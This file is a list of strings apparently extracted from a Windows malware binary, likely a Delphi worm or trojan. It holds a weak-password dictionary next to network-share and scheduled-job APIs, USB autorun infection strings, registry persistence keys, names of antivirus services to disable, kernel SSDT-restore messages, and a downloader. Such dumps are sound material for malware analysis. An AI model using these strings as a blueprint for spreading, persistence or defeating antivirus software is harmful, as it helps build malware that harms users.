GetDiskFreeSpaceExA
GetDriveTypeA
GetErrorInfo
GetFileAttributesA
Get File Info Error!.ExitProc!
Get File Memory Error!
GetFileSize
GetFileType
GetFullPathNameA
gethostbyname
gethostname
GetIconInfo
GetKeyboardType
GetLastError
GetLocaleInfoA
GetLocalTime
GetLongPathNameA
GetMessageA
GetModuleFileNameA
GetModuleHandleA
GetObjectA
Get PE Load Memory Error!!!
GetProcAddress
GetStartupInfoA
GetStdHandle
GetStockObject
GetStringTypeExA
GetSysColor
GetSystemDirectoryA
GetSystemMetrics
GetSystemPaletteEntries
GetTempPathA
GetTextMetricsA
GetThreadLocale
GetTickCount
GetVersion
GetVersionExA
GlobalAlloc
GlobalFree
GlobalHandle
GlobalLock
GlobalReAlloc
GlobalUnlock
godblessyou
 goto try1
 goto try2
Graphics
+Graphics
GREEK_CHARSET
HANGEUL_CHARSET
harley
Heap32First
Heap32ListFirst
Heap32ListNext
Heap32Next
HEBREW_CHARSET
height
HNavigate
HTTP\shell\open\command
$$.Ico
.idata
if exist "
ihavenopass
IInterface
ImageBase: 0x%.8X, KeServiceDescriptorTable: 0x%8X, SSDT BaseAddress: 0x%8X, SSDT Count: 0x%X
inet_addr
inet_ntoa
INFNAN
InitializeCriticalSection
InstallShield Installation Information
Integer
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
InternetCloseHandle
Internet Explorer
InternetExplorer.Application
InternetGetConnectedState
InternetOpenA
InternetOpenUrlA
InternetReadFile
Is File No MZ Header!!!
Is File No PE Header!!!
IStringsAdapter
jiamijiemi
jianceshaomiao
JOHAB_CHARSET
kavsvc
kernel32.dll
KERNEL32.DLL
KeServiceDescriptorTable
KillTimer
KPfwSvc
KWindows
LeaveCriticalSection
letmein
LoadIconA
LoadLibraryA
LoadLibraryAGetProcAddressVirtualProtectVirtualAllocVirtualFreeExitProcessRegOpenKeyASetROP2WNetAddConnection2ANetRemoteTODCoInitializeVariantCopyExtractIconAURLDownloadToFileAGetDCInternetOpenAhtons
LoadLibraryExA
LoadResource
LoadStringA
LocalAlloc
LocalFileTimeToFileTime
LocalFree
LockResource
LongWord
lordsys
lstrcpynA
lstrlenA
MAC_CHARSET
Map %s Demo: %.8X!!!
Map %s Error!!!
McAfeeFramework
McShield
McTaskManager
m/d/yy
memcpy
MessageBoxA
Messenger
Microsoft Frontpage
MiniReg
MiniSniffer
mmmm d, yyyy
:mm:ss
Module32First
Module32FirstW
Module32Next
Module32NextW
MoveToEx
Movie Maker
mpr.dll
MPR.DLL
MskService
MSN Gamin Zone
MS Sans Serif
MulDiv
MultiByteToWideChar
mustang
mypass
mypass123
mypc123
myUPdatetxt.txt
navapsvc
netapi32.dll
NETAPI32.DLL
NetApiBufferFree
`NetBios
NetMeeting
NetRemoteTOD
NetScheduleJobAdd
NetShareEnum
Neutral
No.%d: Break...Now Ssdt %.8X
No.%d: Old: %.8X, New: %.8X
NPFMntor
NTDETECT.COM
ntkrnlpa.exe
ntoskrnl.exe
OEM_CHARSET
ole32.dll
OLE32.DLL
oleaut32.dll
OLEAUT32.DLL
OleStr
Open File Info Error!
OpenProcess
OpenSCManagerA
OpenServiceA
Outlook Express
passwd
password
patrick
PeepNet
PostMessageA
P.reloc
Process32First
Process32FirstW
Process32Next
Process32NextW
P.rsrc
qComConst
QTypInfo
QueryPerformanceCounter
QueryServiceConfig2A
QueryServiceConfig2W
qwerty
RaiseException
.rdata
ReadFile
Read File Info Error!
RealizePalette
Real Ssdt %.8X
Recycled
RegCloseKey
RegCreateKeyExA
RegDeleteValueA
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
ReleaseDC
.reloc
ResetEvent
resizable
RESSDT
\\\\.\\RESSDTDOS
rmdir /s /q 
RsCCenter
RsRavMon
RtlAnsiStringToUnicodeString
"RTLConsts
RtlFreeUnicodeString
RtlInitAnsiString
RtlUnwind
Runtime error     at 00000000
RUSSIAN_CHARSET
sActiveX
SafeArrayCreate
SafeArrayGetLBound
SafeArrayGetUBound
SafeArrayPtrOfIndex
Schedule
SelectObject
SelectPalette
SendMessageA
server
SetBkColor
SetBkMode
SetEndOfFile
SetEvent
SetFileAttributesA
SetFilePointer
SetFileTime
SetROP2
SetTextColor
SetTimer
shadow
sharedaccess
shell32.dll
SHELL32.DLL
*ShellAPI
shell\explore=
shell\explore\Command=
shell\open=
shell\open\Command=
shell\open\Default=1
SHFileOperationA
SHIFTJIS_CHARSET
ShortInt
Single
SizeofResource
Smallint
SmartSniff
SNDSrvc
Sniffer
socket
Software\Borland\Delphi\Locales
SOFTWARE\Borland\Delphi\RTL
Software\Borland\Locales
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun
Software\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVP
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Associates Error Reporting Service
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE
SPBBCSvc
spynet
StartServiceA
StatusBar
strcat
strcpy
StretchBlt
_stricmp
String
Strings
svchosL.exe
sybase
Symantec Core LC
SYMBOL_CHARSET
SysAllocStringLen
SysConst
SysFreeString
SysInit
SysReAllocStringLen
System
system32
\SystemRoot\System32\
System Volume Information
SysUtils
tagEXCEPINFO 
TColor
TCustomMemoryStreamtMA
TCustomVariantType
temp123
TerminateProcess
TErrorRec
test123
TExceptRec
TFileName
TFileStream
TFontCharset
TGraphic
TGraphic 
THAI_CHARSET
THandleStream
!This program cannot be run in DOS mode.
This program must be run under Win32
Thread32First
Thread32Next
TIconImage
TIdentMapEntry
TIntConst
TInterfacedObject
TInterfacedPersistent
TInterfacedPersistenthHA
TlHelp32
TlsGetValue
TlsSetValue
TMemoryStream
$TMultiReadExclusiveWriteSynchronizer
TNetBIOS
TObjecth
TObjectt
toolbar
Toolhelp32ReadProcessMemory
TPatternManagerSV
TPersistent
TPersistentxGA
TRegGroup
TRegGroups
TResourceManager
TSearchRecX
TSharedImage
TStream
TStringItem
TStringList
TStringList,KA
TStrings
TStringsTIA
TThreadListxGA
TThreadLocalCounter
TURKISH_CHARSET
TXPlatform.exe
UnhandledExceptionFilter
Unknown
UnrealizeObject
Update
URLDownloadToFileA
URLMON.DLL
USB_Infect
user32.dll
USER32.DLL
UTypes
VarAdd
VarAnd
VarBoolFromStr
VarBstrFromBool
VarBstrFromCy
VarBstrFromDate
VarCmp
VarCyFromStr
VarDateFromStr
VarDiv
VarI4FromStr
Variant
VariantChangeType
VariantChangeTypeEx
VariantClear
VariantCopy
VariantInit
Variants
VarIdiv
VarMod
VarMul
VarNeg
VarNot
VarR4FromStr
VarR8FromStr
VarSub
VarUnit
$VarUtils
VarXor
VirtualAlloc
VirtualFree
VirtualProtect
VirtualQuery
Visible
WaitForSingleObject
WideCharToMultiByte
WideStringh
WINDOWS
Windows Media Player
Windows NT
\WINDOWS\Start Menu\Programs\Startup\
WindowsUpdate
WinExec
?WinInet
wininet.dll
WININET.DLL
\WINNT\Profiles\All Users\Start Menu\Programs\Startup\
WinRAR
WinSock
Winsock Expert
WinSvc
WinSvcEx
WNetAddConnection2A
WNetCancelConnectionA
WriteFile
WSACleanup
WSAStartup
wscsvc
wsock32.dll
WSOCK32.DLL
Wt_Time
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
ZwClose
ZwCreateFile
ZwQueryInformationFile
ZwQuerySystemInformation
ZwQuerySystemInformation failed! ulNeededSize = %ul
ZwReadFile
zxcvxcxzcxzzzzzzzzzzzzzzzzzzzzzzzzzz